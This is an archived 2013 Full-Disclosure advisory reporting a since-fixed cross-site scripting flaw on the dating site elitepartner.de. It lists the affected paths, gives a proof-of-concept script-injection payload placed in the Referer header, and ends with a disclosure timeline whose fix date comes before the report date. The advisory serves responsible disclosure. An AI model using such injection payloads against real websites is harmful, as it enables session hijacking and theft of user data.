lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <50EF0C98.3090802@t-online.de> Date: Thu, 10 Jan 2013 19:46:48 +0100 From: Stefan Schurtz <sschurtz@...nline.de> To: full-disclosure@...ts.grok.org.uk Subject: http://www.elitepartner.de Cross-site Scripting vulnerability -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Advisory: www.elitepartner.de - Cross-site Scripting vulnerability Advisory ID: SSCHADV2012-024 Author: Stefan Schurtz Affected Software: Successfully tested on www.elitepartner.de Vendor URL: http://www.elitepartner.de Vendor Status: fixed ========================== Vulnerability Description ========================== http://www.elitepartner.de is prone to a XSS vulnerability ========================== PoC-Exploit ========================== http://www.elitepartner.de/km/gfx/starthomepage/ http://www.elitepartner.de/km/static/js/jquery/ http://www.elitepartner.de/km/gfx/ http://www.elitepartner.de/km/static/ http://www.elitepartner.de/km/js/ http://www.elitepartner.de/km/static/js/omniture/ http://www.elitepartner.de/km/static/js/ Referer: '"></style></script><script>alert(/huh/)</script> ========================== Solution ========================== fixed ========================== Disclosure Timeline ========================== 23-Dec-2012 - informed by contact form 10-Jan-2012 - fixed by developer ========================== Credits ========================== Vulnerability found and advisory written by Stefan Schurtz. ========================== References ========================== http://www.darksecurity.de/advisories/2012/SSCHADV2012-024.txt -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (MingW32) Comment: Thunderbird-Portable 3.1.20 by GnuPT - Gnu Privacy Tools Comment: Download at: http://thunderbird.gnupt.de iEYEARECAAYFAlDvDJQACgkQg3svV2LcbMAcOQCeLfeDdv3GZSCIR3N5XWfzfNzr TuoAnieTg9xWXLpCkCtWe0J/A5nua7Po =9YP0 -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/